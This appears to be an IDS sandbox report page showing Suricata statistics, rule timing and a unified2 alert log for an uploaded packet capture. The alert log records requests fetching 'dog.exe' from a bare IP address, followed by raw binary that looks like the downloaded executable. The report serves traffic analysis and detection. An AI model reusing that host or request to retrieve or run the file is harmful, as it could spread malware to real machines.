Filename: a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 24.1711988449 seconds
Hash: 62429eda87eaf55ba4e1b45d7bcd1db9
Uploaded: 1556721318

Logfiles


packet_stats.log - (14817 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           946          4353718      352305215     200849160        190.0b   95.16
 IPv4      17            41          3312108      351248726     200011273          8.2b    4.11
 IPv6      17             8          3026195      352648762     182327419          1.5b    0.73
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           946            69706       26629946        398532        377.0m   95.74
TMM_FLOWWORKER              IPv4      17            41           128374         673205        223871          9.2m    2.33
TMM_RECEIVEPCAPFILE         IPv4       6           945             2552          42664          3104          2.9m    0.74
TMM_RECEIVEPCAPFILE         IPv4      17            41             2560           3648          2918        119.7k    0.03
TMM_DECODEPCAPFILE          IPv4       6           945             2658          35865          2927          2.8m    0.70
TMM_DECODEPCAPFILE          IPv4      17            41             2691          11315          3170        130.0k    0.03
TMM_FLOWWORKER              IPv6      17             8           146645         317669        193488          1.5m    0.39
TMM_RECEIVEPCAPFILE         IPv6      17             8             2809          13057          4279         34.2k    0.01
TMM_DECODEPCAPFILE          IPv6      17             8             2831          41129          8257         66.1k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           945             2834          45972          3467          3.3m  0.90  
flow                    IPv4      17            41             2829          12457          4246        174.1k  0.05  
stream                  IPv4       6           946             2798         313184          7882          7.5m  2.06  
app-layer               IPv4      17            41             2536          24743          4856        199.1k  0.05  
detect                  IPv4       6           946            46653       25766675        358192        338.9m  93.52 
detect                  IPv4      17            41           111720         517716        197740          8.1m  2.24  
tcp-prune               IPv4       6           946             2558          17947          2989          2.8m  0.78  
flow                    IPv6      17             8             2918          22966          6759         54.1k  0.01  
app-layer               IPv6      17             8             2548          18465          7979         63.8k  0.02  
detect                  IPv6      17             8           115411         252279        164195          1.3m  0.36  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             3             4050          65206         25461         76.4k  75.04 
dns                     IPv4      17             2             6922           7912          7417         14.8k  14.57 
http                    IPv6      17             1            10571          10571         10571         10.6k  10.39 
Proto detect            IPv4      17             8             2779           8779          4842         38.7k
Proto detect            IPv6      17             4             3319          11425          6845         27.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             3            66601         224279        121700        365.1k  3.65  
LOGGER_UNIFIED2             IPv4       6             3            65680        8150318       2781120          8.3m  83.36 
LOGGER_JSON_ALERT           IPv4       6             3           101920         347675        185191        555.6k  5.55  
LOGGER_JSON_DNS             IPv4      17             2            98086         126513        112299        224.6k  2.24  
LOGGER_JSON_HTTP            IPv4       6             2           120863         181406        151134        302.3k  3.02  
LOGGER_JSON_FILE            IPv4       6             2            89832         127951        108891        217.8k  2.18  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           603             2619         142013         20726        12.5m  10.99 
payload                           IPv4      17            41             3558          67398         14721       603.6k  0.53  
stream                            IPv4       6           603             2545         683923         36811        22.2m  19.51 
http_uri                          IPv4       6             2            11486          17091         14288        28.6k  0.03  
http_request_line                 IPv4       6             2             8605          13523         11064        22.1k  0.02  
http_client_body                  IPv4       6             2             3758           4686          4222         8.4k  0.01  
http_header (request)             IPv4       6             2           129379         151580        140479       281.0k  0.25  
http_header (request trailer)     IPv4       6             2             3378           3640          3509         7.0k  0.01  
http_header_names (request)       IPv4       6             2            29530          41534         35532        71.1k  0.06  
http_accept (request)             IPv4       6             2             3748           4653          4200         8.4k  0.01  
http_referer (request)            IPv4       6             2             3345           3868          3606         7.2k  0.01  
http_content_len (request)        IPv4       6             2             3434           4804          4119         8.2k  0.01  
http_content_type (request)       IPv4       6             2             3529           4914          4221         8.4k  0.01  
http_protocol (request)           IPv4       6             2             5264          32715         18989        38.0k  0.03  
http_start (request)              IPv4       6             2            17754          20318         19036        38.1k  0.03  
http_raw_header (request)         IPv4       6             2            16591          18804         17697        35.4k  0.03  
http_method                       IPv4       6             2             5883           6739          6311        12.6k  0.01  
http_cookie (request)             IPv4       6             2             3934           3941          3937         7.9k  0.01  
http_raw_uri                      IPv4       6             2             5292           6137          5714        11.4k  0.01  
http_user_agent                   IPv4       6             2            48086          54271         51178       102.4k  0.09  
http_host                         IPv4       6             2             7272           7597          7434        14.9k  0.01  
dns_query                         IPv4      17             1             8721           8721          8721         8.7k  0.01  
http_response_line                IPv4       6             2            10709          10996         10852        21.7k  0.02  
http_header (response)            IPv4       6             2            58891          61637         60264       120.5k  0.11  
http_header (response trailer)    IPv4       6             2             2638           3185          2911         5.8k  0.01  
http_content_type (response)      IPv4       6             2             6251          11011          8631        17.3k  0.02  
http_raw_header (response)        IPv4       6           595             4369          30320          4845         2.9m  2.53  
http_cookie (response)            IPv4       6             2             4128           4200          4164         8.3k  0.01  
http_stat_code                    IPv4       6             2             4402           4757          4579         9.2k  0.01  
file_data (http response)         IPv4       6           593             2573        8006341        125759        74.6m  65.55 
Total                             IPv4                  2484                                         45756       113.7m
payload                           IPv6      17             8             5933          22304         13263       106.1k  0.09  
Total                             IPv6                     8                                         13263       106.1k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6             4            21922          54056         39335        157.3k  0.03  
PROF_DETECT_IPONLY          IPv4      17             8            37665         105708         59763        478.1k  0.10  
PROF_DETECT_RULES           IPv4       6           946             2547       25102096        142067        134.4m  27.14 
PROF_DETECT_RULES           IPv4      17            41            52512         317591        107260          4.4m  0.89  
PROF_DETECT_STATEFUL_START    IPv4       6           502             5106       23030493         93520         46.9m  9.48  
PROF_DETECT_STATEFUL_CONT    IPv4       6           946             2619         401194         18905         17.9m  3.61  
PROF_DETECT_STATEFUL_CONT    IPv4      17            41             2584          20992          3437        140.9k  0.03  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           938             2562          88227          3006          2.8m  0.57  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             2             2864           3154          3009          6.0k  0.00  
PROF_DETECT_PREFILTER       IPv4       6           946             8081        8197122        150318        142.2m  28.71 
PROF_DETECT_PREFILTER       IPv4      17            41            24711          91752         38440          1.6m  0.32  
PROF_DETECT_PF_PAYLOAD      IPv4       6           603            13173         727689         66893         40.3m  8.15  
PROF_DETECT_PF_PAYLOAD      IPv4      17            41             8633          72733         20064        822.6k  0.17  
PROF_DETECT_PF_TX           IPv4       6           938             2555        8021483         90119         84.5m  17.07 
PROF_DETECT_PF_TX           IPv4      17             1            14388          14388         14388         14.4k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           529             2543          40673          3825          2.0m  0.41  
PROF_DETECT_PF_SORT1        IPv4      17            41             2735           5061          3461        141.9k  0.03  
PROF_DETECT_PF_SORT2        IPv4       6           946             2542          23739          2984          2.8m  0.57  
PROF_DETECT_PF_SORT2        IPv4      17            41             2563           4209          2939        120.5k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       6           946             2542          53194          2980          2.8m  0.57  
PROF_DETECT_NONMPMLIST      IPv4      17            41             2682           3328          2855        117.1k  0.02  
PROF_DETECT_ALERT           IPv4       6           946             2527          36515          2872          2.7m  0.55  
PROF_DETECT_ALERT           IPv4      17            41             2531           2945          2611        107.1k  0.02  
PROF_DETECT_CLEANUP         IPv4       6           946             2560         143459          3020          2.9m  0.58  
PROF_DETECT_CLEANUP         IPv4      17            41             2529           4476          2730        112.0k  0.02  
PROF_DETECT_GETSGH          IPv4       6           946             2533         456265          3389          3.2m  0.65  
PROF_DETECT_GETSGH          IPv4      17            41             2545          19354          3857        158.2k  0.03  
PROF_DETECT_IPONLY          IPv6      17             4             5996          13484          9312         37.2k  0.01  
PROF_DETECT_RULES           IPv6      17             8            42019         102698         70629        565.0k  0.11  
PROF_DETECT_STATEFUL_CONT    IPv6      17             8             2636           3162          2818         22.5k  0.00  
PROF_DETECT_PREFILTER       IPv6      17             8            28014          48504         36195        289.6k  0.06  
PROF_DETECT_PF_PAYLOAD      IPv6      17             8            11310          27791         18567        148.5k  0.03  
PROF_DETECT_PF_SORT1        IPv6      17             8             2918           4089          3285         26.3k  0.01  
PROF_DETECT_PF_SORT2        IPv6      17             8             2636           4620          3396         27.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv6      17             8             2745           3429          3136         25.1k  0.01  
PROF_DETECT_ALERT           IPv6      17             8             2538           4946          2874         23.0k  0.00  
PROF_DETECT_CLEANUP         IPv6      17             8             2579           6745          3490         27.9k  0.01  
PROF_DETECT_GETSGH          IPv6      17             8             2553          54336         14675        117.4k  0.02  


suricata-4.0.0-etpro-all-perf.txt-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt - (51157 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 5/1/2019 -- 14:35:42. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2022270      1        2        20861701     17.17  1        0        20861701    20861701.00 0.00        20861701.00
  2        2016854      1        3        531532       0.44   1        0        531532      531532.00   0.00        531532.00  
  3        2018241      1        2        525534       0.43   21       0        468748      25025.43    0.00        25025.43   
  4        2801929      1        7        2398795      1.97   29       0        446362      82717.07    0.00        82717.07   
  5        2807130      1        4        2197469      1.81   127      0        399994      17302.91    0.00        17302.91   
  6        2019165      1        3        714694       0.59   21       0        399471      34033.05    0.00        34033.05   
  7        2824739      1        2        692258       0.57   21       0        396953      32964.67    0.00        32964.67   
  8        2008575      1        5        4391389      3.61   589      0        385707      7455.67     0.00        7455.67    
  9        2820158      1        2        3153799      2.60   20       0        254232      157689.95   0.00        157689.95  
  10       2820157      1        2        3213483      2.64   20       0        250830      160674.15   0.00        160674.15  
  11       2016855      1        2        191712       0.16   1        0        191712      191712.00   0.00        191712.00  
  12       2819659      1        4        813064       0.67   7        0        187150      116152.00   0.00        116152.00  
  13       2020865      1        3        898406       0.74   7        0        185799      128343.71   0.00        128343.71  
  14       2819664      1        2        4036859      3.32   27       0        182856      149513.30   0.00        149513.30  
  15       2819930      1        2        3983852      3.28   27       0        172449      147550.07   0.00        147550.07  
  16       2819933      1        2        757574       0.62   7        0        126420      108224.86   0.00        108224.86  
  17       2802991      1        5        721435       0.59   11       0        120915      65585.00    0.00        65585.00   
  18       2018496      1        9        149440       0.12   2        0        120616      74720.00    0.00        74720.00   
  19       2801930      1        7        1815956      1.49   29       0        116803      62619.17    0.00        62619.17   
  20       2018342      1        2        314525       0.26   3        0        108230      104841.67   0.00        104841.67  
  21       2827094      1        2        1091588      0.90   13       0        101693      83968.31    0.00        83968.31   
  22       2014819      1        3        94583        0.08   1        0        94583       94583.00    0.00        94583.00   
  23       2803027      1        6        1271909      1.05   19       0        91894       66942.58    0.00        66942.58   
  24       2022502      1        4        129180       0.11   2        0        89048       64590.00    0.00        64590.00   
  25       2826332      1        2        475306       0.39   7        0        84504       67900.86    0.00        67900.86   
  26       2805348      1        4        505081       0.42   10       0        81609       50508.10    0.00        50508.10   
  27       2008305      1        3        271219       0.22   72       0        80065       3766.93     0.00        3766.93    
  28       2019714      1        10       77072        0.06   1        1        77072       77072.00    77072.00    0.00       
  29       2018358      1        7        110517       0.09   2        0        74090       55258.50    0.00        55258.50   
  30       2816909      1        2        133245       0.11   2        0        73665       66622.50    0.00        66622.50   
  31       2022054      1        3        73563        0.06   1        0        73563       73563.00    0.00        73563.00   
  32       2802987      1        5        3047142      2.51   62       0        72684       49147.45    0.00        49147.45   
  33       2016141      1        5        69937        0.06   1        1        69937       69937.00    69937.00    0.00       
  34       2804927      1        2        519953       0.43   10       0        69805       51995.30    0.00        51995.30   
  35       2816910      1        2        127543       0.10   2        0        69172       63771.50    0.00        63771.50   
  36       2804907      1        3        467382       0.38   8        0        68824       58422.75    0.00        58422.75   
  37       2816940      1        2        125427       0.10   2        0        67995       62713.50    0.00        62713.50   
  38       2804911      1        3        642022       0.53   12       0        67535       53501.83    0.00        53501.83   
  39       2019822      1        7        336623       0.28   21       0        66964       16029.67    0.00        16029.67   
  40       2803657      1        5        478119       0.39   9        0        66783       53124.33    0.00        53124.33   
  41       2020569      1        1        194930       0.16   4        0        63781       48732.50    0.00        48732.50   
  42       2018982      1        2        192789       0.16   4        0        62869       48197.25    0.00        48197.25   
  43       2804906      1        3        110337       0.09   2        0        61219       55168.50    0.00        55168.50   
  44       2816666      1        4        335407       0.28   21       0        59908       15971.76    0.00        15971.76   
  45       2015744      1        4        74742        0.06   7        1        58061       10677.43    58061.00    2780.17    
  46       2013352      1        4        116548       0.10   21       0        57706       5549.90     0.00        5549.90    
  47       2805985      1        2        206209       0.17   4        0        57480       51552.25    0.00        51552.25   
  48       2018959      1        3        161742       0.13   21       1        56966       7702.00     56966.00    5238.80    
  49       2018572      1        2        326066       0.27   21       0        55227       15526.95    0.00        15526.95   
  50       2816924      1        4        80364        0.07   2        0        52445       40182.00    0.00        40182.00   
  51       2022552      1        2        781783       0.64   36       0        52343       21716.19    0.00        21716.19   
  52       2024775      1        1        182074       0.15   47       0        51067       3873.91     0.00        3873.91    
  53       2808234      1        1        182071       0.15   4        0        50319       45517.75    0.00        45517.75   
  54       2807400      1        3        180781       0.15   4        0        50166       45195.25    0.00        45195.25   
  55       2017190      1        6        49759        0.04   1        0        49759       49759.00    0.00        49759.00   
  56       2024771      1        1        3416459      2.81   595      0        49506       5741.95     0.00        5741.95    
  57       2019344      1        5        88241        0.07   2        0        49386       44120.50    0.00        44120.50   
  58       2022050      1        3        176113       0.14   4        0        49016       44028.25    0.00        44028.25   
  59       2009897      1        14       57906        0.05   4        0        47871       14476.50    0.00        14476.50   
  60       2014353      1        6        103519       0.09   21       0        47697       4929.48     0.00        4929.48    
  61       2806802      1        2        1364885      1.12   66       0        47347       20680.08    0.00        20680.08   
  62       2018375      1        3        646564       0.53   49       0        47296       13195.18    0.00        13195.18   
  63       2802880      1        3        270699       0.22   9        0        47097       30077.67    0.00        30077.67   
  64       2024778      1        1        475012       0.39   143      0        45575       3321.76     0.00        3321.76    
  65       2019345      1        2        3199960      2.63   227      0        45561       14096.74    0.00        14096.74   
  66       2022896      1        5        45115        0.04   1        0        45115       45115.00    0.00        45115.00   
  67       2009028      1        11       107562       0.09   21       0        44707       5122.00     0.00        5122.00    
  68       2024178      1        2        67129        0.06   2        0        44456       33564.50    0.00        33564.50   
  69       2008438      1        20       174587       0.14   4        0        44386       43646.75    0.00        43646.75   
  70       2826156      1        2        138640       0.11   6        0        44211       23106.67    0.00        23106.67   
  71       2822367      1        2        123823       0.10   7        0        43892       17689.00    0.00        17689.00   
  72       2017613      1        9        76242        0.06   2        0        43701       38121.00    0.00        38121.00   
  73       2022609      1        2        78391        0.06   2        0        42815       39195.50    0.00        39195.50   
  74       2021076      1        2        101946       0.08   21       1        42380       4854.57     42380.00    2978.30    
  75       2009909      1        10       52546        0.04   4        0        42367       13136.50    0.00        13136.50   
  76       2822979      1        3        42334        0.03   1        0        42334       42334.00    0.00        42334.00   
  77       2018958      1        18       64862        0.05   2        0        42281       32431.00    0.00        32431.00   
  78       2804508      1        2        42103        0.03   1        0        42103       42103.00    0.00        42103.00   
  79       2018121      1        4        42072        0.03   1        0        42072       42072.00    0.00        42072.00   
  80       2025064      1        5        82806        0.07   2        0        41876       41403.00    0.00        41403.00   
  81       2016948      1        2        505588       0.42   35       0        41462       14445.37    0.00        14445.37   
  82       2013441      1        9        49794        0.04   4        0        41000       12448.50    0.00        12448.50   
  83       2816929      1        4        69538        0.06   2        0        40858       34769.00    0.00        34769.00   
  84       2809859      1        6        72356        0.06   2        0        40790       36178.00    0.00        36178.00   
  85       2816525      1        10       74839        0.06   2        0        40405       37419.50    0.00        37419.50   
  86       2809850      1        2        40246        0.03   1        0        40246       40246.00    0.00        40246.00   
  87       2820928      1        2        620688       0.51   43       0        40204       14434.60    0.00        14434.60   
  88       2020573      1        2        40052        0.03   1        1        40052       40052.00    40052.00    0.00       
  89       2014471      1        6        39011        0.03   1        0        39011       39011.00    0.00        39011.00   
  90       2017552      1        6        4637312      3.82   334      0        38932       13884.17    0.00        13884.17   
  91       2022482      1        3        38918        0.03   1        0        38918       38918.00    0.00        38918.00   
  92       2828122      1        2        77003        0.06   2        0        38891       38501.50    0.00        38501.50   
  93       2023679      1        3        320921       0.26   21       0        38242       15281.95    0.00        15281.95   
  94       2820851      1        5        75763        0.06   2        0        38144       37881.50    0.00        37881.50   
  95       2015547      1        4        38141        0.03   1        0        38141       38141.00    0.00        38141.00   
  96       2022550      1        16       38125        0.03   1        0        38125       38125.00    0.00        38125.00   
  97       2021067      1        2        37742        0.03   1        1        37742       37742.00    37742.00    0.00       
  98       2022942      1        2        37356        0.03   1        0        37356       37356.00    0.00        37356.00   
  99       2816327      1        4        74044        0.06   2        0        37123       37022.00    0.00        37022.00   
  100      2016029      1        3        36486        0.03   1        0        36486       36486.00    0.00        36486.00   
  101      2012143      1        3        36338        0.03   1        0        36338       36338.00    0.00        36338.00   
  102      2828207      1        3        111287       0.09   6        0        36238       18547.83    0.00        18547.83   
  103      2020838      1        3        344187       0.28   21       0        36200       16389.86    0.00        16389.86   
  104      2830124      1        1        71175        0.06   2        0        36187       35587.50    0.00        35587.50   
  105      2809306      1        4        1955640      1.61   137      0        36004       14274.74    0.00        14274.74   
  106      2020826      1        7        35508        0.03   1        0        35508       35508.00    0.00        35508.00   
  107      2018403      1        10       35307        0.03   1        0        35307       35307.00    0.00        35307.00   
  108      2023625      1        3        100338       0.08   25       0        35257       4013.52     0.00        4013.52    
  109      2018452      1        15       70213        0.06   2        0        35171       35106.50    0.00        35106.50   
  110      2018421      1        2        34966        0.03   1        0        34966       34966.00    0.00        34966.00   
  111      2020941      1        2        34666        0.03   1        0        34666       34666.00    0.00        34666.00   
  112      2010140      1        7        210040       0.17   44       0        34478       4773.64     0.00        4773.64    
  113      2815326      1        2        34430        0.03   1        0        34430       34430.00    0.00        34430.00   
  114      2810481      1        4        325326       0.27   16       0        34414       20332.88    0.00        20332.88   
  115      2816356      1        2        63022        0.05   2        0        34237       31511.00    0.00        31511.00   
  116      2819857      1        1        101725       0.08   4        0        34112       25431.25    0.00        25431.25   
  117      2016578      1        5        34040        0.03   1        0        34040       34040.00    0.00        34040.00   
  118      2001330      1        8        1460338      1.20   516      0        33999       2830.11     0.00        2830.11    
  119      2016097      1        4        33744        0.03   1        0        33744       33744.00    0.00        33744.00   
  120      2001195      1        9        84538        0.07   5        0        33497       16907.60    0.00        16907.60   
  121      2023672      1        4        324562       0.27   21       0        33419       15455.33    0.00        15455.33   
  122      2816526      1        13       62015        0.05   2        0        33381       31007.50    0.00        31007.50   
  123      2022658      1        4        33172        0.03   1        0        33172       33172.00    0.00        33172.00   
  124      2819694      1        2        320266       0.26   21       0        33142       15250.76    0.00        15250.76   
  125      2809410      1        2        32

This file has been truncated. Go here to download in full.


unified2.alert.1556721340 - (16682 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
4\dz ¾GÍÀ¨d¯¼¦JÚÀ(P—\dz \dz ¾G{EmŒ³À¨d¯¼¦JÚÀ(PP(ŒGET /dog.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 188.166.74.218
Connection: Keep-Alive

4\dz ¾Gт
À¨d¯¼¦JÚÀ(P—\dz \dz ¾G{EmŒ³À¨d¯¼¦JÚÀ(PP(ŒGET /dog.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 188.166.74.218
Connection: Keep-Alive

4\dz OΏ!¼¦JÚÀ¨d¯PÀ(\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(PÔýFëkÉdjdXéhW<;ú_~+ы…À3À^ËiÀèPQÿQ<YY3À@^ÃV‹t$ÿvDè™ÿÿ‹D$ÿvDƒ¦ ‰†˜‹D$‰†œèz™ÿÿYY3À^ÃV‹t$ÿvDèI™ÿÿ‹D$Y3É;Á~‹L$‰†‹D$‰†ë‰Ž‰ŽÿvD‰Žè,™ÿÿY^ËL$…É~‹D$Ph¨}@‰ˆ¤Pëjjÿt$èWÿÿÿƒÄ3ÀËD$ǀØÃV‹t$WÿvDèÀ˜ÿÿ‹L$‹¾˜ÿvD‰Ž”‹L$‰Ž˜è¼˜ÿÿYY‹Ç_^ÃV‹t$WÿvD艘ÿÿ‹L$‹¾ ÿvD‰Žœ‹L$‰Ž è…˜ÿÿYY‹Ç_^ÃV‹t$WÿvDèR˜ÿÿ‹L$‹¾¤ÿvD‰Ž¨‹L$‰Ž¤èN˜ÿÿYY‹Ç_^ÃV‹t$WÿvDè˜ÿÿ‹L$‹¾´ÿvD‰Ž¸‹L$‰Ž´è˜ÿÿYY‹Ç_^ÃV‹t$WÿvDèä—ÿÿ‹L$‹¾¬ÿvD‰Ž°‹L$‰Ž¬èà—ÿÿYY‹Ç_^ËT$ƒú
w$‹D$V‹t$LH‹…öx‹•ÄïF;ò~‹ò‰1^ÃÈÿÃV‹t$ÿvDè}—ÿÿ‹D$ÿvDƒ¦À‰†¼‹D$‰†Äèx—ÿÿYY3À^ÃV‹t$ÿvDèG—ÿÿ‹D$ÿvDƒ¦¼‰†À‹D$‰†ÄèB—ÿÿYY3À^ËD$¶@ÃÃV‹t$ÿvDè—ÿÿ‹D$ÿvD÷ØÀ%ÿÿÿÿ‰Fè—ÿÿYY3À^ÃU‹ìQS‹]WÿsDÇEüè̖ÿÿY3É9MtA;K}x‹{V‹u‹Š:u„ÒtŠP:VuƒÀƒÆ„Òuä3ÀëÀƒØÿ…Àt	AƒÇ;K|É^;K}7‹Cɋ|È…ÿt*è-Âÿÿ‹G‹‹@8‹…ÉtÿuÿuPÿQ(ƒÄ‰Eü‹ÇèlÂÿÿÿsDè]–ÿÿ‹EüY_[ÉÃSU‹l$VWjhPúFUèšÿÿƒÄ…ÀuƒÅ‹ÍèF™ÿÿ‹ø»ôÇF‹3WVUèå™ÿÿƒÄ…ÀuŠ>„Àt<=tƒÃûüÇF|Ù3À_^][Ã3À@ëöU‹ìQQ‹@‹MøQPÿP@ÝEøÜ
°øFYYܘ*Fèxƒ‰‰VÆF*ÉÃU‹ìQQ‹Ç‹Ëèj‘ÿÿ…Àu3ÀÉËNjËècÿÿ…ÀtïVºXúF‹Ëè™ÿÿ…Àu‹E‹÷èÿÿÿë:juü‹Ã菙ÿÿY…Àt-EøP‹Ãè0šÿÿÝEøÜ
°øFYܘ*Fèü‚‰‰WÆG*3Àë3À@^ÉÃU‹ìƒìhV‹ðWEÈ3ÿÇE\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P)³ü+Ɗ„Ét¶ÉŠ‰`ÅFGˆ0Fƒÿ|çÆD=ȾEȃøl÷„ºƒø+tƒø-tƒÀЃø	‡EðPEÈ蝙ÿÿYLȀ9:…ž¶EÈö€`ÆFuÈuuÉj0E˜jPèŠ#ƒÄE˜‹ÎèXŽÿÿ…À…µu˜èKÿÿ‹}˜jÿÇÒlýƒUœÿh¤ÙúÿuœW萂jh\&RPèbMøUœ€}È-u
‹Eœ÷߃Ð÷؉Eœ‹óèÿÿ;‹EœfÇC(CÆC+é2¶ö€`ÆF‰MøtA¶ö€`ÆFuó‰Møè—ÿÿ‹øGýƒø‡Dÿ€8suÆO‹ó褎ÿÿÙîÝEðƒeüØÑßàÝÙöÄzÝè*Fëݘ*FÝ]èƒÿu#‹uøj¿àúFY3Àó¦„AÝØÇEüéJƒÿu ‹uøj¿ØúFY3Àó¦…ÆÜ
ÐúFéjY;ùu8‹uøj¿ÈúFY3Àó¦uÜ
ÀúFéñ‹uøj¿¸úFY3Àó¦u™Ü
èøFéÕÝ؃ÿu‰‹uø¿°úF3Àó¦…wÿÿÿ‹óè|ÿÿ‹ÃèkÿÿÝEðèv€‹ø{‹Kj^Aÿ…ɍAô™÷þ‹óÆC*CkÀ+ȉK薍ÿÿ‰}øÛEøÙÀÝEðÚéßàöÄD{sÜmðÜ
¨úFëS‹uøj¿ úFY3Àó¦…ýþÿÿ耋ø‹ó‰}øèúŽÿÿ‹Ãèéÿÿ{ÆC*è>ÿÿÛEøÙÀÝEðÚéßàöÄD{ÜmðÜ
˜úFÜ
°øFÜEèèþSëÝØfÇC(ÆC+é`j
¿ŒúFuÈY3Àó¦…K‹óèâŒÿÿ‹ÃèýÿÿSfÇC(ÆC+éƒès„–HH„ôHH…jEÈh€úFP萁ƒÄ…À…õEðPEÐ莖ÿÿY…ÀŽàÝEðè(‰EøÛEøÝEðÚéßàöÄDŠÂƒ}øŒ¸ÝxúFÜ]ðßàöÄA…¤‹óèäÿÿ‹ÃèӎÿÿfÇC*è)Œÿÿ‹;‹Cj‹ÏÁŠ¹¾\&VƒÐPQèljjRP耉Eð‹Eø‰Uô™9Uô|9EðvƒEðùƒUôÿ+EðjUôVRPèJÇS‰‰Séìþÿÿj
¿lúFuÈY3Àó¦uA8C*t<‹‹Kj^VÀ¨h€QÎQPèò~"S>ÒÈ¿‰‰Sf‰s(ÆC+‰uüéÒj¿húFuÈY3Àó¦…½‹óèT‹ÿÿ‹ÃèoŽÿÿ‹ð)3‹ú‹Ã{fÇC(ÆC\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P+èUŽÿÿ+ðú3{ëpj	EÈh\úFPè
